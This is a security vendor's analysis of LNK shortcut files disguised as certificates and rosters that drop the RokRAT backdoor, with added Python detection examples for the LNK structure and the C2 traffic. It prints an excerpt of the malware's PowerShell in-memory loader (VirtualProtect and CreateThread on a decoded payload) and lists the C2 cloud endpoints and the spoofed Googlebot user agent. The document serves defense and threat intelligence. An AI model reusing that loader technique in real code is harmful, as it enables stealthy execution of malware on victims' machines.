LNK File Disguised as Certificate Distributing RokRAT Malware - ASEC
By ATCP
Published: 2024-04-22 · Archived: 2026-04-05 18:09:58 UTC
https://asec.ahnlab.com/en/65076/

AhnLab SEcurity intelligence Center (ASEC) has confirmed the continuous distribution of shortcut files (*.LNK) of abnormal sizes that disseminate backdoor-type malware. The recently confirmed shortcut files (*.LNK) are found to be targeting South Korean users, particularly those related to North Korea. The confirmed LNK file names are as follows:

- National Information Academy 8th Integrated Course Certificate (Final).lnk
- Gate access roster 2024.lnk
- Northeast Project (US Congressional Research Service (CRS Report).lnk
- Facility list.lnk

The confirmed LNK files contain a command to execute PowerShell via CMD, and their type is similar to the type found in “RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)” [1] posted last year. A notable fact about this type is that it includes legitimate document files, script code, and malicious PE data inside the LNK files.

The simplified operation process of the malware is as shown below. When the LNK file is executed, it runs PowerShell commands to create and execute a legitimate document file. Afterward, it creates 3 files in the %public% folder. The names and features of the files created in this step are as follows.

| File name | Location in LNK file | Feature |
|---|---|---|
| viewer.dat | 0x2BC97 (size: 0xD9402) | Encoded RokRAT malware |
| search.dat | 0x105099 (size: 0x5AA) | Executes viewer.dat file |
| find.bat | 0x105643 (size: 0x139) | Executes search.dat file |

Table 1. List of created files

The first executed item is “find.bat”, which runs “search.dat” via PowerShell. “search.dat” reads the “viewer.dat” file and executes it in a fileless manner.
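As an added example (not code from the ASEC post or from the sample it analyses), a small Python parser for the Shell Link format: it walks the header, optional ID list and LinkInfo, the StringData fields, and the ExtraData blocks, then reports how many bytes sit past the end of the structure, which is where this type of LNK carries its decoy document, scripts and PE data. The sample shortcut it builds is constructed here and is not the real file's bytes.

```python
import struct
# MS-SHLLINK constants: header CLSID, LinkFlags bits, StringData flags in file order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FLAGS = {0x04: "name", 0x08: "relative_path", 0x10: "working_dir",
                0x20: "arguments", 0x40: "icon_location"}

def build_lnk(relative_path, arguments, appended=b""):
    """Constructed sample: minimal Unicode LNK, TerminalBlock, then `appended` bytes."""
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")  # StringData element
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, 0x08 | 0x20 | IS_UNICODE,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + sd(relative_path) + sd(arguments) + b"\0\0\0\0" + appended

def parse_lnk(data):
    """Return (StringData dict, number of bytes left over after the LNK structure)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\0\0\0" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:    # LinkTargetIDList: uint16 size, then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfo: uint32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    strings, width = {}, 2 if flags & IS_UNICODE else 1
    for bit, name in STRING_FLAGS.items():
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1", "replace")
            pos += 2 + count * width
    size = 4
    while size >= 4 and pos + 4 <= len(data):  # ExtraData blocks; size < 4 = TerminalBlock
        size = struct.unpack_from("<I", data, pos)[0]
        pos += max(size, 4)
    return strings, max(0, len(data) - pos)

def assess(data):
    """Flag cmd.exe launching PowerShell and payload bytes appended past the structure."""
    strings, trailing = parse_lnk(data)
    findings = []
    if ("cmd" in strings.get("relative_path", "").lower()
            and "powershell" in strings.get("arguments", "").lower()):
        findings.append("cmd.exe launching powershell")
    if trailing:
        findings.append(f"{trailing} bytes appended after LNK structure")
    return findings

# Constructed sample, not the real file's bytes: decoy bytes plus filler appended
SAMPLE = build_lnk(r"..\..\Windows\System32\cmd.exe",
                   '/c powershell -WindowStyle Hidden -Command "Get-Content ..."',
                   b"decoy-document" + b"\0" * 4000)
```

On a real file the trailing byte count is what makes a shortcut "abnormally sized"; the Table 1 offsets are exactly such positions inside the appended region.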
```powershell
$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;   # read the payload file as raw bytes
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34
# ... (omitted) ...
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);                       # allocate a buffer for the payload
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);      # make it PAGE_EXECUTE_READWRITE
for($i = 0;$i -lt $byteCount;$i++) { [System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); };   # copy the bytes in
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);                  # run the buffer as a new thread
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);                       # wait up to 500 seconds
```

The data of “viewer.dat” that is ultimately executed is the RokRAT malware, a backdoor capable of using cloud APIs to collect user information and perform various malicious behaviors at the threat actor’s command. The collected information is transmitted to the threat actor’s cloud server using cloud services such as pCloud, Yandex, and DropBox. At this point, the User-Agent in the request header is disguised as Googlebot, and the cloud URLs used are listed in the table below.

User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

| Cloud | URL |
|---|---|
| pCloud (down) | https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1 |
| pCloud (up) | https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1 |
| Yandex (down) | https://cloud-api.yandex.net/v1/disk/resources/download?path=%s |
| Yandex (up) | https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s |
| DropBox (down) | https://content.dropboxapi.com/2/files/download |
| DropBox (up) | https://content.dropboxapi.com/2/files/upload |

Table 2.
Details on the cloud URLs used

The malicious behaviors that can be executed according to the threat actor’s command include:

- Execution of cmd commands
- Collection of directory listings
- Deletion of specific files (with VBS, CMD, BAT, and LNK extensions) within the Startup folder
- Collection of Startup folder listings, %APPDATA% folder listings, and recently used file listings
- Collection of PC information (system information, IP, router information, etc.)

Additionally, various other malicious behaviors can be performed, and the collected information is stored in the %TEMP% folder before being uploaded to the threat actor’s cloud server.

The email addresses of the threat actor identified during the analysis process are as follows.

- tanessha.samuel@gmail[.]com
- tianling0315@gmail[.]com
- w.sarah0808@gmail[.]com
- softpower21cs@gmail[.]com

Through its blog, ASEC has been consistently sharing information about the distribution of malicious shortcut files because such incidents occur frequently. In particular, malware aimed at individuals associated with Korean unification, the military, and education has been identified continuously for a long time, highlighting the need for extra caution.

[File Detection]
Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent.R579429 (2023.05.05.01)

MD5
3114a3d092e269128f72cfd34812ddc8
35441efd293d9c9fb4788a3f0b4f2e6b
358122718ba11b3e8bb56340dbe94f51
68386fa9933b2dc5711dffcee0748115
6e5e5ec38454ecf94e723897a42450ea

Additional IOCs are available on AhnLab TIP.

Source: https://asec.ahnlab.com/en/65076/
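An added example, not part of the ASEC post: detection logic for the C2 channel described above, run over constructed proxy log lines. It flags requests to the Table 2 endpoints and requests carrying the Googlebot User-Agent, and rates a line high only when both traits appear together, since a crawler UA should never originate from an internal client. The log layout (client, method, URL, quoted UA) is an assumption.

```python
import re
from urllib.parse import urlsplit

# Cloud API endpoints from Table 2, reduced to (host, path); the %s query templates are dropped
ROKRAT_ENDPOINTS = {
    ("api.pcloud.com", "/getfilelink"): "pCloud download",
    ("api.pcloud.com", "/uploadfile"): "pCloud upload",
    ("cloud-api.yandex.net", "/v1/disk/resources/download"): "Yandex download",
    ("cloud-api.yandex.net", "/v1/disk/resources/upload"): "Yandex upload",
    ("content.dropboxapi.com", "/2/files/download"): "Dropbox download",
    ("content.dropboxapi.com", "/2/files/upload"): "Dropbox upload",
}
# The crawler UA the post reports; a real Googlebot never originates inside the network
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
# Assumed proxy log layout (constructed for this example): client method url "user-agent"
LOG_RE = re.compile(r'^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')

def check_line(line):
    """Return a finding dict for one log line, or None if it is unremarkable."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["url"])
    reasons = []
    if m["ua"] == GOOGLEBOT_UA:
        reasons.append("Googlebot UA from internal client")
    endpoint = ROKRAT_ENDPOINTS.get(((url.hostname or "").lower(), url.path))
    if endpoint:
        reasons.append(endpoint + " API")
    if not reasons:
        return None
    # Both traits together are the pattern the post describes; one alone is only a lead
    return {"client": m["client"], "severity": "high" if len(reasons) == 2 else "low",
            "reasons": reasons}

def scan(lines):
    """Run check_line over a log and keep only the hits."""
    return [f for f in map(check_line, lines) if f]

# Constructed log lines: two RokRAT-style requests, one legitimate Dropbox client, one unrelated
SAMPLE_LOG = [
    '10.0.0.15 POST https://api.pcloud.com/uploadfile?path=/a&filename=x.dat&nopartial=1 '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '10.0.0.15 GET https://cloud-api.yandex.net/v1/disk/resources/download?path=/c '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '10.0.0.22 POST https://content.dropboxapi.com/2/files/upload "Dropbox-Desktop/1.0"',
    '10.0.0.31 GET https://example.com/index.html "Mozilla/5.0 (Windows NT 10.0)"',
]
```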